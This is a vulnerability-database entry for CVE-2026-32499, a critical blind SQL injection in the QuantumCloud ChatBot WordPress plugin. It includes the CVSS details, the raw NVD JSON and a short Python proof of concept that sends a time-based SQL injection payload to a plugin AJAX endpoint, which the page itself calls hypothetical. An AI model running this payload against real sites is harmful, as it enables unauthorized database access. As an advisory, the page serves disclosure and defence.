Security Vulnerability Report
中文
CVE-2026-32499 CVSS 9.3 CRITICAL

CVE-2026-32499

Published: 2026-03-25 17:17:02
Last Modified: 2026-04-24 16:35:20

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in QuantumCloud ChatBot chatbot allows Blind SQL Injection.This issue affects ChatBot: from n/a through <= 7.7.9.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

QuantumCloud ChatBot <= 7.7.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # Proof of Concept for CVE-2026-32499 import requests import time def check_sqli(url): # Hypothetical vulnerable endpoint and parameter based on typical WordPress plugin structure payload = "1' AND (SELECT SLEEP(5))-- -" target_url = f"{url}/wp-admin/admin-ajax.php?action=qcld_chatbot_load_messages&chat_id={payload}" try: start_time = time.time() response = requests.get(target_url, timeout=10) end_time = time.time() if end_time - start_time >= 5: print(f"[+] Vulnerability detected at {url}") print(f"[+] Response time: {end_time - start_time:.2f}s") else: print(f"[-] Not vulnerable or patched.") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target = "http://example.com" check_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32499", "sourceIdentifier": "[email protected]", "published": "2026-03-25T17:17:01.817", "lastModified": "2026-04-24T16:35:20.070", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in QuantumCloud ChatBot chatbot allows Blind SQL Injection.This issue affects ChatBot: from n/a through <= 7.7.9."}, {"lang": "es", "value": "La vulnerabilidad de Neutralización Inadecuada de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') en el chatbot QuantumCloud ChatBot permite Inyección SQL Ciega. Este problema afecta a ChatBot: desde n/a hasta &lt;= 7.7.9."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/chatbot/vulnerability/wordpress-chatbot-plugin-7-7-9-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}